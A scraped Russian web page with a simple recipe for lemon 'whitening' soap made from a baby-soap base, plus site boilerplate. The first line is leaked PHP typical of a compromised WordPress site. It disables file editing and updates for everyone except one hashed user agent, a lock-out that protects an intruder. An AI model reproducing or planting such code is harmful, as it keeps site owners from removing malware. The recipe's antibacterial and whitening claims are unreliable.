if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мастер-класс, как сделать отбеливающее мыло “Кислинка” с лимоном | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мастер-класс, как сделать отбеливающее мыло “Кислинка” с лимоном

Некоторые светлокожие красавицы отлично знают, что ультрафиолет в любом виде им вреден и трепетно охраняют нежную белизну своего лица и тела. Именно для таких, кому солнышка много (особенно на лице) нельзя, отличный рецепт лимонного мыла!

Согла­си­тесь, все-таки жен­щи­ны отно­сят­ся к себе очень кри­тич­но. Одни все сво­бод­ные мину­ты про­во­дят в соля­ри­ях, считая,что толь­ко кожа цве­та шоко­ла­да даст им осо­бый шарм, а неко­то­рые свет­ло­ко­жие кра­са­ви­цы отлич­но зна­ют, что уль­тра­фи­о­лет в любом виде им вре­ден и тре­пет­но охра­ня­ют неж­ную белиз­ну сво­е­го лица и тела. Имен­но для таких, кому сол­ныш­ка мно­го (осо­бен­но на лице) нель­зя, отлич­ный рецепт лимон­но­го мыла.

Как обыч­но — ника­ких осо­бых затрат и тех­но­ло­гий. Весь сек­рет это­го мыла в нату­раль­ном лимон­ном соке, бла­го­да­ря чему оно обла­да­ет отлич­ны­ми анти­бак­те­ри­аль­ны­ми и отбе­ли­ва­ю­щи­ми свой­ства­ми. Нам понадобится:

  • 100 грамм дет­ско­го мыла
  • Поло­ви­на чай­ной лож­ки лимон­но­го сока
  • Мас­ло аво­ка­до — поло­ви­на чай­ной ложки
  • Мас­ло эфир­ное (лимон­ный аро­мат) 6–8 капель.
  • Пище­вой кра­си­тель жел­тый — око­ло 4 капель.

Рабо­та­ем с ком­по­нен­та­ми по прин­ци­пу преж­них рецеп­тов: разо­гре­ва­ем осно­ву, добав­ля­ем кра­си­тель, затем мас­ла и пере­ли­ва­ем в фор­му до пол­но­го засты­ва­ния. Вот и все. Сле­ду­ет пом­нить, что мыло на осно­ве нату­раль­ных ком­по­нен­тов (такое как наше лимон­ное) не под­ле­жит дол­го­му хра­не­нию, поэто­му будь­те вни­ма­тель­ны к датам изго­тов­ле­ния и хранения.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Rio Rita

Обожаю мыловарение и всегда рада поделиться своими знаниями с мыловарами :) Читайте все мои записи!